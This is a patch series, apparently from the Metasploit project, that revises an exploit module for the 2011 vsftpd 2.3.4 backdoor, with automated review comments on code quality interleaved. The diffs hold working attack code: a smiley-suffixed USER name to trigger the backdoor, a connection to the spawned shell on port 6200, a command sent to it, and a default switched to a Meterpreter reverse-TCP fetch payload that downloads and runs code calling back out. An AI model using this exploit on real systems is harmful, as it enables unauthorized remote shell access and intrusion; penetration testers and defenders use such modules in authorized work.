From 037826daf5fa0b589ee6a90aa97a41214c7c7652 Mon Sep 17 00:00:00 2001
From: g0t mi1k
Date: Tue, 10 Feb 2026 16:54:06 +0000
Subject: [PATCH 1/6] vsftpd_234_backdoor: Add check
---
.../exploits/unix/ftp/vsftpd_234_backdoor.rb | 39 +++++++++++++++++++
1 file changed, 39 insertions(+)
diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
index 70b3b03de1..82bde1d912 100644
--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -56,6 +56,45 @@ class MetasploitModule < Msf::Exploit::Remote register_options([ Opt::RPORT(21) ]) end + def check + # Check for backdoor first, else exploit will fail + vprint_status("Checking if backdoor has already been triggered (else exploit will fail)") + nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil + if nsock + print_error("The port used by the backdoor bind listener is already open/in-use (6200/TCP)") + return Exploit::CheckCode::Unknown + end + + vprint_status("Connecting to FTP service") + connect + + vprint_status("Checking FTP banner") + banner = sock.get_once(-1, 30).to_s + + if banner.downcase.include?("vsftpd 2.3.4") + print_status("FTP banner hints its vulnerable: #{banner.strip}") + else + vprint_status("FTP banner: #{banner.strip}") + end + + ftp_user = rand_text_alphanumeric(rand(6) + 1) + vprint_status("Trying to log into FTP (User: #{ftp_user})") + sock.put("USER #{ftp_user}\r\n") + resp = sock.get_once(-1, 30).to_s + if resp =~ /^530 / + print_error("This server is configured for anonymous only and the backdoor code cannot be reached") + return Exploit::CheckCode::Safe + end + + if resp !~ /^331 / + print_error("This server did not respond as expected: #{resp.strip}") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears if banner.downcase.include?("vsftpd 2.3.4") and resp =~ /^331 / + return Exploit::CheckCode::Unknown + end + def exploit nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock From 7161c2cbe6c255194eee4ddfffdd43bf80479085 Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Tue, 10 Feb 2026 16:56:46 +0000 Subject: [PATCH 2/6] vsftpd_234_backdoor: Checks & raises for exploit --- .../exploits/unix/ftp/vsftpd_234_backdoor.rb | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 82bde1d912..96f714f05b 100644 
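Review bot: The probe socket to 6200 in `check` is never closed: when `nsock` is non-nil the method prints the error and returns `Exploit::CheckCode::Unknown` with that connection still open, so `disconnect(nsock)` belongs before the `return`. The FTP control connection opened by the bare `connect` is likewise not closed on any of the later return paths (unless the framework's own cleanup does it); an `ensure` that calls `disconnect` would cover them all. The last condition repeats a test already made, because the `resp !~ /^331 /` guard has returned by then, so it can be `return Exploit::CheckCode::Appears if banner.downcase.include?("vsftpd 2.3.4")`, which also drops the low-precedence `and`. The `rescue nil` modifier on the probe hides whether the connect was refused, timed out, or failed on a coding error; rescuing the expected connection error classes would keep that distinction.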
--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -96,11 +96,22 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + framework.sessions.each do |sid, sess| + next unless sess.via_exploit + if sess.via_exploit == fullname + vprint_error("Session #{sid} is already connected to the backdoor") + end + end + nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock - print_status("The port used by the backdoor bind listener is already open") - handle_backdoor(nsock) - return + print_warning("The port used by the backdoor bind listener is already open. Trying...") + begin + handle_backdoor(nsock) + rescue + vprint_error("Someone has beat us to it, the backdoor is already in-use!") + raise Msf::Exploit::Failed, "Backdoor already in-use" + end end # Connect to the FTP service port first @@ -145,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote if r !~ /uid=/ print_error("The service on port 6200 does not appear to be a shell") disconnect(s) - return + raise Msf::Exploit::Failed, 'Could not connect to backdoor' end print_good("UID: #{r.strip}") From dc2ec5ef39a94baf8040642aabf82a705f7878f2 Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Tue, 10 Feb 2026 16:58:20 +0000 Subject: [PATCH 3/6] vsftpd_234_backdoor: Be more verbose --- .../exploits/unix/ftp/vsftpd_234_backdoor.rb | 24 +++++++++++++------ 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 96f714f05b..7b7a36650a 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb 
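Review bot: In the `if nsock` branch of `exploit` the `return` that used to follow `handle_backdoor(nsock)` is gone, so when that call succeeds control falls through to the FTP connect and login code below the hunk; a `return` after the `begin`/`rescue` block restores the old behaviour. The bare `rescue` also catches the `Msf::Exploit::Failed` that the second hunk makes `handle_backdoor` raise (assuming it descends from StandardError) and replaces its message with "Backdoor already in-use", and it would mask unrelated errors as well; rescue only the expected class, or let the original exception propagate. In the session loop, `next unless sess.via_exploit` is redundant with the `== fullname` comparison that follows. The body of `exploit` continues outside this hunk.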
@@ -115,14 +115,18 @@ class MetasploitModule < Msf::Exploit::Remote end # Connect to the FTP service port first + vprint_status("Connecting to FTP service") connect + vprint_status("Checking FTP banner") banner = sock.get_once(-1, 30).to_s - print_status("Banner: #{banner.strip}") + vprint_status("FTP banner: #{banner.strip}") - sock.put("USER #{rand_text_alphanumeric(rand(6) + 1)}:)\r\n") + ftp_user = "#{rand_text_alphanumeric(rand(6) + 1)}:)" + vprint_status("Trying to log into FTP via backdoor. User: #{ftp_user}") + sock.put("USER #{ftp_user}\r\n") resp = sock.get_once(-1, 30).to_s - print_status("USER: #{resp.strip}") + vprint_status(resp.strip) if resp =~ /^530 / print_error("This server is configured for anonymous only and the backdoor code cannot be reached") 
@@ -136,30 +140,36 @@ class MetasploitModule < Msf::Exploit::Remote return end - sock.put("PASS #{rand_text_alphanumeric(rand(6) + 1)}\r\n") + ftp_pass = "#{rand_text_alphanumeric(rand(6) + 1)}" + vprint_status("Trying to log into FTP via backdoor. Password: #{ftp_pass}") + sock.put("PASS #{ftp_pass}\r\n") # Do not bother reading the response from password, just try the backdoor + vprint_status("Connecting to backdoor on 6200/TCP") nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock - print_good("Backdoor service has been spawned, handling...") + print_good("Backdoor has been spawned!") handle_backdoor(nsock) return + else + print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?") end disconnect end def handle_backdoor(s) + vprint_status("Trying 'id' command") s.put("id\n") r = s.get_once(-1, 5).to_s if r !~ /uid=/ - print_error("The service on port 6200 does not appear to be a shell") + print_error("The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?") disconnect(s) raise Msf::Exploit::Failed, 'Could not connect to backdoor' end - print_good("UID: #{r.strip}") + vprint_good("UID: #{r.strip}") s.put("nohup " + payload.encoded + " >/dev/null 2>&1") handler(s) From 5c29007f8532bf84a8df98737a6b0284ec20831c Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Tue, 10 Feb 2026 16:58:38 +0000 Subject: [PATCH 4/6] vsftpd_234_backdoor: Add comments --- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 7b7a36650a..3ebee7373e 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb 
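Review bot: The `else` added after the `if nsock` branch follows a `return`, so it only adds nesting; the warning can sit directly after the `if`. Since the previous commit made other failure paths raise, ending this path on `print_warning` alone leaves the run without a failure reason, and `fail_with(Failure::Unreachable, 'Unable to connect to backdoor on 6200/TCP')` would be consistent with them. `ftp_pass = "#{rand_text_alphanumeric(rand(6) + 1)}"` interpolates a String into an otherwise empty literal; assign the call result directly. The `rescue nil` on the connect discards the exception, so "Cooldown?" is a guess; printing the rescued error with `vprint_error` would say what actually happened.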
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution', 'Description' => %q{ - This module exploits a malicious backdoor that was added to the VSFTPD download + This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. @@ -96,6 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + # Check for backdoor first, else exploit will fail framework.sessions.each do |sid, sess| next unless sess.via_exploit if sess.via_exploit == fullname @@ -105,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock + # Chance are, we will fail, but doesn't hurt to try print_warning("The port used by the backdoor bind listener is already open. Trying...") begin handle_backdoor(nsock) @@ -114,10 +116,11 @@ class MetasploitModule < Msf::Exploit::Remote end end - # Connect to the FTP service port first + # Now connect to the FTP service vprint_status("Connecting to FTP service") connect + # Without this, 220 response, rather than 331 vprint_status("Checking FTP banner") banner = sock.get_once(-1, 30).to_s vprint_status("FTP banner: #{banner.strip}") @@ -155,6 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?") end + # Finished with FTP disconnect end 
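Review bot: The comment added at the top of `exploit`, `# Check for backdoor first, else exploit will fail`, does not describe the loop under it, which walks `framework.sessions` and only prints a verbose message; `# Warn if an existing session already came from this module` matches the code. In the `if nsock` hunk, `# Chance are, we will fail, but doesn't hurt to try` should read `# Chances are this will fail, but it doesn't hurt to try`. `# Without this, 220 response, rather than 331` is hard to parse; `# Read the 220 banner first so the next read returns the reply to USER (331)` appears to be what is meant. In the `handle_backdoor` hunk of the same commit, `# Wait 5 seconds and get everything` overstates `get_once(-1, 5)`, which as far as the call shows reads what arrives within a 5-second timeout; `# Read whatever arrives within 5 seconds` is closer.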
@@ -162,9 +166,11 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Trying 'id' command") s.put("id\n") + # Wait 5 seconds and get everything r = s.get_once(-1, 5).to_s if r !~ /uid=/ print_error("The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?") + # Finished with the backdoor disconnect(s) raise Msf::Exploit::Failed, 'Could not connect to backdoor' end From 53ac84be038f4ce47413de5d00af450e523cd101 Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Fri, 20 Feb 2026 08:08:55 +0000 Subject: [PATCH 5/6] vsftpd_234_backdoor: Reconfig default target --- .../exploits/unix/ftp/vsftpd_234_backdoor.rb | 32 ++++++++++++++----- 1 file changed, 24 insertions(+), 8 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 3ebee7373e..8877a21890 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -33,15 +33,24 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'Space' => 2000, 'BadChars' => '', - 'DisableNops' => true, - 'Compat' => - { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find' - } + 'DisableNops' => true }, 'Targets' => [ - [ 'Automatic', {} ], + [ + 'Backdoor Shell', + { + 'Type' => :unix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/interact' + }, + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + } + } + } + ] ], 'DisclosureDate' => '2011-07-03', 'DefaultTarget' => 0, @@ -177,7 +186,14 @@ class MetasploitModule < Msf::Exploit::Remote vprint_good("UID: #{r.strip}") - s.put("nohup " + payload.encoded + " >/dev/null 2>&1") + unless payload.encoded.empty? + c = "" + c << payload.encoded + c << "\n" + vprint_status("Running: #{c.strip}") + s.put(c) + end + handler(s) end end From bc81140d4f04d0a2cfa96165902b100d944d7bbc Mon Sep 17 00:00:00 2001 
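Review bot: The command string in the last `handle_backdoor` hunk is built by mutating an empty literal (`c = ""` followed by two `<<` calls), which reads awkwardly and would raise `FrozenError` if the file ever adopts `# frozen_string_literal: true`. `cmd = "#{payload.encoded}\n"` does the same in one line and gives the variable a name that says what it holds. `payload.encoded` is also evaluated twice; binding it once to a local before the `unless` makes the emptiness test and the send use the same value.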
From: g0t mi1k Date: Fri, 20 Feb 2026 08:27:06 +0000 Subject: [PATCH 6/6] vsftpd_234_backdoor: Add Linux fetch payload support Fetch over CmdStager (& multiple targets) --- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 8877a21890..0458f2c37a 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ], ], 'Privileged' => true, - 'Platform' => [ 'unix' ], + 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, @@ -37,17 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ [ - 'Backdoor Shell', + 'Linux/Unix Command', { 'Type' => :unix_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/unix/interact' - }, - 'Payload' => { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', - } + # This exploit also supports direct interaction with the backdoor using cmd/unix/interact payload + 'PAYLOAD' => 'cmd/linux/http/x86/meterpreter_reverse_tcp' } } ]
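Review bot: The commit subject mentions multiple targets, but the `'Targets'` array in this hunk still holds a single entry, renamed to 'Linux/Unix Command' with `'Type' => :unix_cmd` unchanged; either the subject or the target list should be brought in line. With the `'Compat'` block removed and the default changed to a fetch payload, the module documentation and any `'Notes'`/`'SideEffects'` metadata outside this hunk should be re-checked, since a fetch payload typically writes a file on the target where the earlier interact default did not (presumably `ARTIFACTS_ON_DISK`). The inline comment is long for a hash body and would read better above `'DefaultOptions'` as `# cmd/unix/interact is still supported for direct interaction with the backdoor`.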